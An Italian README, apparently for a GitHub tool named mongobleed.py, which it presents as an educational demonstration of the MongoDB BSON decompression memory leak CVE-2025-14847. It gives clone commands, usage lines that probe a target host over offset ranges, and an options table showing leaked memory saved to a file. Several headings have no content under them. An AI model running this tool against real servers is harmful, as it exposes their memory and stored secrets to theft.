
Strumento di ricerca educativa che dimostra la divulgazione di memoria CVE-2025-14847 nella decompressione BSON di MongoDB. Simula errori di controllo dei limiti e concetti di sicurezza della memoria per l'analisi delle vulnerabilità.
Questo repository contiene uno strumento di ricerca educativo progettato per dimostrare i concetti di sicurezza della memoria alla base di CVE-2025-14847, una vulnerabilità critica scoperta nell'implementazione della decompressione BSON di MongoDB. Lo strumento simula come un controllo improprio dei limiti durante la decompressione possa portare alla divulgazione di memoria.
Questo strumento dimostra:
Prerequisiti
git clone https://github.com/InfoSecAntara/CVE-2025-14847-MongoDB.git
cd CVE-2025-14847-MongoDB
# Basic scan (offsets 20-8192)
python3 mongobleed.py --host <target>
# Deep scan for more data
python3 mongobleed.py --host <target> --max-offset 50000
# Custom range
python3 mongobleed.py --host <target> --min-offset 100 --max-offset 20000
Questa vulnerabilità evidenzia problemi più ampi nella sicurezza dei database:
Risorse ufficiali:
| Opzione | Default | Descrizione |
|---|
--host | localhost | Host MongoDB di destinazione |
--port | 27017 | Porta MongoDB di destinazione |
--min-offset | 20 | Lunghezza minima del documento da sondare |
--max-offset | 8192 | Lunghezza massima del documento da sondare |
--output | leaked.bin | File di output per i dati trapelati |